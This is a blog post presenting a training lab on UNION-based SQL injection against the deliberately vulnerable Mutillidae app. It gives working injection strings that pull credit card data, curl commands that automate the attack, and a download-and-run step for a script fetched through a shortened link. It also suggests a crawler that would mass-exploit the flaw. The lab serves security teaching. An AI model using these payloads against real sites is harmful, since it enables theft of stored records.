Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 8 - SQL Injection Union Exploit #1

OWASP Top 10 Web Hacking Final Lab 8 - SQL Injection Union Exploit #1

Written By Akademy on Thursday, November 21, 2013 | November 21, 2013

{ SQL Injection Union Exploit #1 }

    OWASP Top 10 Web Hacking Final  Lab 8
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)
  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.

Database Union Explanation
  1. On OWASPbwa - Mutillidae
    • Notes (FYI):
      •  Instructions:
      1. su - root  (có thể không cần nếu đã login với root)
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;
  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables, list all the tables in the particular DATABASE.
  3. Show Tables
    • Instructions:
      1. desc accounts;
      2. desc credit_cards;
    • Notes (FYI):
      1. desc accounts, show the accounts TABLE fields.
      2. desc credit_cards, show the credit_cards TABLE fields.
  4. Table Union
    • Instructions:
      1. select * from accounts union select ccid,ccnumber,ccv,expiration,null from credit_cards;
    • Notes (FYI):
      1. UNION is used to combine the result from multiple SELECT statements into a single result set.
      2. The UNION operator is ALSO used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of fields of other tables.
      3. We will later use this technique in (Section 14, Step 4).

Section 8. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 9. Go To User Info Page
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 10. Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences
  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
     
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configurations
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

Section 11. Configure Burpsuite Settings
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Assessment ---> Web Vulnerability Proxies --> burpsuite
  2. JRE Message
    • Instructions:
      1. Click OK
  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080
  4. Turn on intercept
    • Instructions:
      1. Click on the proxy tab
      2. Click on the intercept tab
      3. Verify the intercept button shows "intercept is off"

Section 12. SQL Injection (Union Example #1)
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. First Union SQL Injection Attempt
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null --
      2. Click the View Account Details button
    • Note(FYI):
      1. Remember to put a space after the --
  4. SQL Error
    • Note(FYI):
      1. Scroll down and notice the SQL Error.
      2. Point #1, developers should never display MySQL and Debug statements in results.
      3. Point #2, MySQL is actually telling us that we do not have the correct number of column that match up with the union statement.
    • Instructions:
      1. Read the Error Message.
      2. Click the Back Arrow.

Section 13. SQL Injection (Union Example #2)
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. Second Union SQL Injection Attempt
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,null --
      2. Click the View Account Details button
    • Note(FYI):
      1. In reality, we would not know that the accounts table has 5 fields without sequentially adding a null value until you get back results without an error.
  4. Viewing the Results
    • Note(FYI):
      1. Scroll down and notice there is not an SQL error.
      2. More importantly, notice application returned
        • username=
        • password=
        • signature=
      3. At first glance this does not look like much.  However, we established a potential way to retrieve data from the database outside of the application's original intent.
    • Instructions:
      1. View the Results
      2. Click the Back Arrow.

Section 14. SQL Injection (Union Example #3)
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. Second Union SQL Injection Attempt
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select 1,2,3,4,5 --
      2. Click the View Account Details button
    • Note(FYI):
      1. The goal with this union statement is to map out which fields in the database align with the above numbers when the output is displayed.
  4. Viewing the Results
    • Note(FYI):
      1. Scroll down and notice that Username is populated with 2, Password is populated with 3, and Signature is populated with 4.
        • Username=2
        • Password=3
        • Signature=4
      2. So, we know that Username is the second table field, Password is the third table field, and Signature is the forth table field.
    • Instructions:
      1. View the Results
      2. Click the Back Arrow.

Section 15. SQL Injection (Union Example #4)
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. Second Union SQL Injection Attempt
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select ccid,ccnumber,ccv,expiration,null from credit_cards --
      2. Click the View Account Details button
    • Note(FYI):
      1. The goal with this union statement is to map out which fields in the database align with the above numbers when the output is displayed.
  4. Viewing the Results
    • Note(FYI):
      1. Scroll down and notice that Username is populated with a credit card number, Password is populated with the CCV, and Signature is populated with the expiration.
        • Username=4444111122223333
        • Password=745
        • Signature=2012-03-01
      2. Congrats, you successful manipulated a "purposeful" bug in the user-info.php script, to display credit card information using a query meant for the accounts table.
    • Instructions:
      1. View the Results

Section 16. SQL Injection (Union Example with Curl #5)
  1. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Scroll down to the bottom, and click on the line that contains --> /mutillidae/index.php?page=user-info.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. View the GET Data String
        • Later we will populate curl with this URL string.
    • Note(FYI):
      • /mutillidae/index.php?page=user-info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpiration%2Cnull+from+credit_cards+--+&password=&user-info-php-submit-button=View+Account+Details
      • The encoded sql injection --> %27+or+1%3D1--+
        1. %27 is a single quote (')
        2. %2C is a comma (,)
        3. + is a space
        4. %3D is a equal sign (=)
  2. Use Curl to Display Usernames and Passwords
    • Note(FYI):
      • I apologize ahead of time for the below mess.  Match up the colors with the explanations.
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Populate a BackTrack Terminal Windows with the below curl command.
        • curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpiration%2Cnull+from+credit_cards+--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep -i "Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}' | awk -F\> '{print $2}'
    • Note(FYI):
      1. --data "page=user-info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpiration%2Cnull+from+credit_cards+--+&password=&user-info-php-submit-button=View+Account+Details"
        • This is the URL POST DATA string we obtained from (Section 14, Step 3).
      2. --location "http://192.168.1.111/mutillidae/index.php"
        • This is the actual webpage script that handles the common gateway interface (CGI) between the web browser and server.
      3. awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}'
        • Use the "<" character as a delimiter or field separator and print each array element on a separate line
      4. grep -i "Username="
        • Display lines that only have the string "Username=".  Remember that the web output from (Section 11, Step 2) contained "Username="
      5. awk -F\> '{print $2}'
        • Use ">" as a delimiter and only print the output from the second field.

Section 17. Perl Parser
  1. Create Output File
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. cd /root
      2. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpiration%2Cnull+from+credit_cards+--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep -i "Username="  > lesson8.txt
      3. cat lesson8.txt
  2. Download Output Parser
    • Instructions:
      1. cd /root
      2. wget http://goo.gl/pUoZak
      3. mv lesson8.pl.TXT lesson8.pl
      4. chmod 700 lesson8.pl
  3. Run Perl Script
    • Instructions:
      1. ./lesson8.pl
    • Note(FYI):
      • So lets put the pieces together. Imagine a web crawler that does nothing but curl webpages for the string "form" that have this particular UNION vulnerability.  If the string "form" is found, then try a simple UNION SQL injection like (' union null-- ).  Then it would recursively append null to the end of the union clause until, no more SQL errors are present.
Section 18. Restore Firefox Original Proxy Configurations
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Firefox Preferences
    • Instructions:
      1. Edit --> Preferences
  3. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
  4. Connection Settings
    • Instructions:
      1. Click on the No proxy radio button
      2. Click on the OK button
      3. Click on the Close button

Section 19. Proof of Lab
  1. Proof of Lab : Các bạn hãy quay lại toàn bộ quá trình thực hiện
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. Security365 - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT